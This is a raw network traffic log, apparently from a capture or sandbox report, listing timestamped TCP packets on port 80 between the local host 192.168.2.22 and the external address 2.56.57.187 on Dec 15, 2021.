Dec 15, 2021 14:47:52.547210932 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547229052 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547249079 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547271967 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547290087 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547306061 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547332048 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547348976 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547369003 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547391891 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547409058 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547429085 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547447920 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547475100 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547487020 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547508955 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547527075 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547542095 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547566891 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547581911 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547606945 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547624111 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547647953 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547661066 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547687054 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547707081 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547727108 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547743082 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547766924 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547782898 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547805071 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547822952 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547844887 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547863007 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547884941 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547902107 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547924042 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547941923 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547964096 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547980070 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548001051 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548018932 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548041105 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548062086 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548079967 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548103094 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548118114 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548135996 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548156023 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548176050 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548196077 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548213959 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548237085 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548254967 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548276901 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548295021 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548315048 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548337936 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548353910 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548372030 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548393965 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548408985 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548430920 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.548458099 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.548494101 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.550266027 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.558963060 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.559019089 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.559051037 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.559081078 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.559120893 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.559159994 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.559196949 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.559232950 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.559237003 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.559276104 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.559302092 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.559304953 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.559307098 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.573895931 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.573956013 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.573988914 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574021101 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574050903 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574090958 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574131966 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574171066 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574208021 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574208021 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574246883 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574249983 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574254036 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574280977 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574287891 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574314117 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574328899 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574346066 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574371099 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574394941 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574409962 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574429035 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574451923 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574474096 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574492931 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574531078 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574532032 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574569941 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574573994 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574609995 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574649096 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574651003 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574686050 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574688911 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574713945 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574719906 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574728966 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574759007 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574771881 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574810028 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574814081 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574840069 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574853897 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574889898 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574892998 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574919939 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574933052 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574954987 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.574974060 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.574999094 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575016022 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575036049 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575053930 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575076103 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575095892 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575117111 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575136900 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575160027 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575175047 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575196028 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575217009 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575237036 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575257063 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575275898 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575297117 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575314045 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575337887 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575356960 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575376034 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575396061 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575414896 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575434923 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575454950 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575474977 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575494051 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575514078 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575536013 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575555086 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575576067 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575598001 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575615883 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575634956 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575655937 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575676918 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575694084 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575717926 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575735092 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575756073 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575776100 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575797081 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575814009 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575841904 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575854063 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575882912 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575894117 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575920105 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575933933 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.575967073 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.575974941 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576008081 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576014042 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576039076 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576054096 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576078892 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576093912 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576121092 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576131105 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576158047 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576172113 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576199055 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576211929 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576240063 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576250076 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576277018 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576291084 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576319933 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576328039 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.576351881 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.576457977 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.577258110 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.577299118 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.577337027 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.577372074 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.577413082 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.577450037 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.577539921 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.577670097 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.577677965 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.577766895 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.577776909 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.578450918 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.584697962 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.584754944 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.584790945 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.584825993 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.584891081 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.584928036 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.584964037 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.585000038 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.585002899 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.585036039 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.585134983 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.585143089 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.585148096 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.585153103 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.585156918 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.585160971 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.585165024 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.585169077 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.591820002 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.592308998 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.601871014 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.601933956 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.601974964 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602015972 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602056980 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602092028 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602094889 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602128983 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602133989 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602137089 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602138042 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602176905 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602185965 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602219105 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602226019 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602258921 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602263927 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602299929 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602303028 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602336884 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602348089 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602376938 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602380037 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602416039 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602418900 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602453947 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602462053 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602494955 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602519035 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602535009 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602540970 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602579117 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602602005 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602642059 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602644920 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602683067 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602683067 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602731943 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602732897 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602772951 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602777004 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602812052 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602823973 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602853060 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602854967 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602895021 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602897882 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602933884 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602938890 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.602972984 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.602977991 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603013039 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603019953 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603051901 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603065014 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603092909 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603096008 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603132963 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603144884 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603172064 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603177071 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603213072 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603215933 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603250980 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603257895 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603288889 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603295088 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603327990 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603338957 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603367090 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603373051 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603405952 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603414059 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603446960 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603454113 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603483915 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603499889 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603524923 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603532076 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603585958 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.603938103 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.603981018 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604002953 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604020119 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604037046 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604060888 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604067087 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604101896 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604130030 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604140997 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604156971 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604182005 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604197979 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604221106 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604235888 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604260921 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604273081 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604300976 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604305983 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604338884 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604357004 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604377985 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604382038 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604418993 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604432106 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604456902 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604469061 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604496956 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.604504108 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.604536057 CET	80	49165	2.56.57.187	192.168.2.22
